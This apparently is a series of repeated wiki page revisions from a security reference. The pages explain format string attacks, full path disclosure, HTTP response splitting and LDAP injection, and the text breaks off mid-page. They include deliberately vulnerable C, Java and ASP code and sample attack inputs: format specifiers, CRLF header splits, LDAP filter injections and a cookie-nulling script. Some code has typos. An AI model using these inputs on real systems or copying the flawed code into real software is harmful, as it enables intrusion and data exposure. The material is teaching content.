|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

* [[:Category: Internal software developer]]

* [[:Category: Outsourced software developer]]

* [[:Category: Insider]]

* [[:Category: Outsider]]

==Related [[Attacks]]==

* [[Code Injection]]

==Related [[Vulnerabilities]]==

* [[Buffer Overflow]]

==Related [[Controls]]==

[[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Format string attack

2008-07-02T11:37:35Z

Edualves: /* Related Attacks */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

* [[:Category: Internal software developer]]

* [[:Category: Outsourced software developer]]

* [[:Category: Insider]]

* [[:Category: Outsider]]

==Related [[Attacks]]==

* [[Code Injection]]

==Related [[Vulnerabilities]]==

[[Buffer Overflow]]

==Related [[Controls]]==

[[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Format string attack

2008-07-02T11:37:21Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

* [[:Category: Internal software developer]]

* [[:Category: Outsourced software developer]]

* [[:Category: Insider]]

* [[:Category: Outsider]]

==Related [[Attacks]]==

[[Code Injection]]

==Related [[Vulnerabilities]]==

[[Buffer Overflow]]

==Related [[Controls]]==

[[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Full Path Disclosure

2008-07-02T11:36:43Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Full Path Disclosure (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/.
Certain vulnerabilities such as using the load_file() (within an SQL injection) query to view page sources require the attacker to have the full path to the file they wish to view.

==Examples==

* '''Empty Array'''

If we have a site that uses a method of requesting a page like this:
<pre>http://site.com/index.php?page=about</pre>
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:
<pre>http://site.com/index.php?page[]=about</pre>
This renders the page defunct thus spitting out an error:
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre>

* '''Null Session Cookie'''

Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.
A simple injection using this method would look something like so:
<pre>javascript:void(document.cookie="PHPSESSID=");</pre>
By simply setting the PHPSESSID cookie to nothing (null) we get an error.
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre>

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[Relative Path Traversal]]

==Related [[Vulnerabilities]]==

* None

==Related [[Controls]]==

This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
<pre>error_reporting(0);</pre>

==References==

* http://www.acunetix.com/vulnerabilities/Full-path-disclosure.htm

*[http://www.enigmagroup.org/ Articled summarised from Full Path Disclosure article by haZed on EnigmaGroup.org.]

*[http://www.enigmagroup.org/pages/view_articles/artID/175/ Original article location (registration required).]

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Full Path Disclosure

2008-07-02T11:36:27Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Full Path Disclosure (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/.
Certain vulnerabilities such as using the load_file() (within an SQL injection) query to view page sources require the attacker to have the full path to the file they wish to view.

==Examples==

* '''Empty Array'''

If we have a site that uses a method of requesting a page like this:
<pre>http://site.com/index.php?page=about</pre>
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:
<pre>http://site.com/index.php?page[]=about</pre>
This renders the page defunct thus spitting out an error:
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre>

* '''Null Session Cookie'''

Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.
A simple injection using this method would look something like so:
<pre>javascript:void(document.cookie="PHPSESSID=");</pre>
By simply setting the PHPSESSID cookie to nothing (null) we get an error.
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre>

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[Relative Path Traversal]]

==Related [[Vulnerabilities]]==

==Related [[Controls]]==

This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
<pre>error_reporting(0);</pre>

==References==

* http://www.acunetix.com/vulnerabilities/Full-path-disclosure.htm

*[http://www.enigmagroup.org/ Articled summarised from Full Path Disclosure article by haZed on EnigmaGroup.org.]

*[http://www.enigmagroup.org/pages/view_articles/artID/175/ Original article location (registration required).]

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

HTTP Response Splitting

2008-07-02T11:31:51Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

HTTP response splitting vulnerabilities occur when:

* Data enters a web application through an untrusted source, most frequently an HTTP request.
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.

To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

==Examples==

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

<pre>
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);
</pre>

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...
</pre>

However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker

HTTP/1.1 200 OK
...
</pre>

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Cross-User Defacement]]
*[[Cache Poisoning]]
*[[Cross-Site Scripting]]
*[[Page Hijacking]]

==Related [[Vulnerabilities]]==

* [[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

==References==

* http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting

* http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting

* Watchfire Whitepaper: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics Whitepaper[http://download.watchfire.com/ttl/wp/HTTPResponseSplitting.pdf?file=HTTPResponseSplitting.pdf&authToken=1214447561_257e36e250a83a8e5942584866d295ee]

==Credit==

{{Template:Fortify}}

[[Category: Protocol Manipulation]]

[[Category: Attack]]

__NOTOC__

HTTP Response Splitting

2008-07-02T11:31:41Z

Edualves: /* Related Vulnerabilities */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

HTTP response splitting vulnerabilities occur when:

* Data enters a web application through an untrusted source, most frequently an HTTP request.
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.

To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

==Examples==

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

<pre>
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);
</pre>

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...
</pre>

However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker

HTTP/1.1 200 OK
...
</pre>

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Cross-User Defacement]]
*[[Cache Poisoning]]
*[[Cross-Site Scripting]]
*[[Page Hijacking]]

==Related [[Vulnerabilities]]==

* [[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting

* http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting

* Watchfire Whitepaper: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics Whitepaper[http://download.watchfire.com/ttl/wp/HTTPResponseSplitting.pdf?file=HTTPResponseSplitting.pdf&authToken=1214447561_257e36e250a83a8e5942584866d295ee]

==Credit==

{{Template:Fortify}}

[[Category: Protocol Manipulation]]

[[Category: Attack]]

__NOTOC__

HTTP Response Splitting

2008-07-02T11:31:29Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

HTTP response splitting vulnerabilities occur when:

* Data enters a web application through an untrusted source, most frequently an HTTP request.
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.

To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

==Examples==

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

<pre>
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);
</pre>

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...
</pre>

However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker

HTTP/1.1 200 OK
...
</pre>

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Cross-User Defacement]]
*[[Cache Poisoning]]
*[[Cross-Site Scripting]]
*[[Page Hijacking]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting

* http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting

* Watchfire Whitepaper: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics Whitepaper[http://download.watchfire.com/ttl/wp/HTTPResponseSplitting.pdf?file=HTTPResponseSplitting.pdf&authToken=1214447561_257e36e250a83a8e5942584866d295ee]

==Credit==

{{Template:Fortify}}

[[Category: Protocol Manipulation]]

[[Category: Attack]]

__NOTOC__

LDAP injection

2008-07-02T11:30:47Z

Edualves: /* Related Controls */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary command such as granting permissions to unauthorized queries, and content modification inside the LDAP tree.
The same advanced exploitation techniques available in SQL Injection can be similarly applied in LDAP Injection.

==Examples==

===Example 1===
In a page with a user search form, the following code is responsible to catch input value and generate a LDAP query that will be used in LDAP database.

<input type="text" size=20 name="userName">Insert the username</input>

The LDAP query is narrowed down for performance and the underlying code for this function might be the following:
String ldapSearchQuery = "(cn=" + $userName + ")";
System.out.println(ldapSearchQuery);

Case the variable $userName is not validated, it could be possible accomplish LDAP injection, as follows:
*If a user puts “*” on box search, the system may return all the usernames on the LDAP base
*If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing jonys’ password
( cn = jonys ) ( | (password = * ) )

===Example 2===
The following vulnerable code is used in an ASP web application which provides login with LDAP data base.
On line 11, the variable userName is initialized and validated to check if it’s not in blank. Then, the content of this variable is used to construct a LDAP query used by SearchFilter on line 28. The attacker has the chance specify what will be queried on LDAP server, and see the result on the line 33 to 41, are all results and their attributes are displayed.

Commented vulnerable asp code:
<nowiki>
1. <html>
2. <body>
3. <%@ Language=VBScript %>
4. <%
5. Dim userName
6. Dim filter
7. Dim ldapObj
8.
9. Const LDAP_SERVER = "ldap.example"
10.
11. userName = Request.QueryString("user")
12.
13. if( userName = "" ) then
14. Response.Write("Invalid request. Please specify a valid
15. user name")
16. Response.End()
17. end if
18.
19. filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
20.
21. 'Creating the LDAP object and setting the base dn
22. Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
23. ldapObj.ServerName = LDAP_SERVER
24. ldapObj.DN = "ou=people,dc=spilab,dc=com"
25.
26. 'Setting the search filter
27. ldapObj.SearchFilter = filter
28.
29. ldapObj.Search
30.
31. 'Showing the user information
32. While ldapObj.NextResult = 1
33. Response.Write("<p>")
34.
35. Response.Write("<b><u>User information for: " +
36. ldapObj.AttrValue(0) + "</u></b><br>")
37. For i = 0 To ldapObj.AttrCount -1
38. Response.Write("<b>" + ldapObj.AttrType(i) +"</b>: " +
39. ldapObj.AttrValue(i) + "<br>" )
40. Next
41. Response.Write("</p>")
42. Wend
43. %>
44. </body>
45. </html> </nowiki>

In the example above, we send the * character in the user parameter which will result in the filter variable in the code to be initialized with (uid=*). The resulting LDAP statement will make the server return any object that contains a uid attribute like username.

<nowiki> http://www.some-site.org/index.asp?user=* </nowiki>

==Related [[Threat Agents]]==

* [[:Category: Insider]]

==Related [[Attacks]]==

*[[Interpreter Injection]]
*[[SQL Injection]]
*[[Command Injection]]
*[[Relative Path Traversal]]
*[[Resource Injection]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

* [[:Category:Input Validation]]

==References==

* http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

* http://www.ietf.org/rfc/rfc1960.txt A String Representation of LDAP Search Filters (RFC1960)

* http://www.redbooks.ibm.com/redbooks/SG244986.html IBM RedBooks - Understanding LDAP

* http://www.webappsec.org/projects/threat/classes/ldap_injection.shtml

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

LDAP injection

2008-07-02T11:30:34Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary command such as granting permissions to unauthorized queries, and content modification inside the LDAP tree.
The same advanced exploitation techniques available in SQL Injection can be similarly applied in LDAP Injection.

==Examples==

===Example 1===
In a page with a user search form, the following code is responsible to catch input value and generate a LDAP query that will be used in LDAP database.

<input type="text" size=20 name="userName">Insert the username</input>

The LDAP query is narrowed down for performance and the underlying code for this function might be the following:
String ldapSearchQuery = "(cn=" + $userName + ")";
System.out.println(ldapSearchQuery);

Case the variable $userName is not validated, it could be possible accomplish LDAP injection, as follows:
*If a user puts “*” on box search, the system may return all the usernames on the LDAP base
*If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing jonys’ password
( cn = jonys ) ( | (password = * ) )

===Example 2===
The following vulnerable code is used in an ASP web application which provides login with LDAP data base.
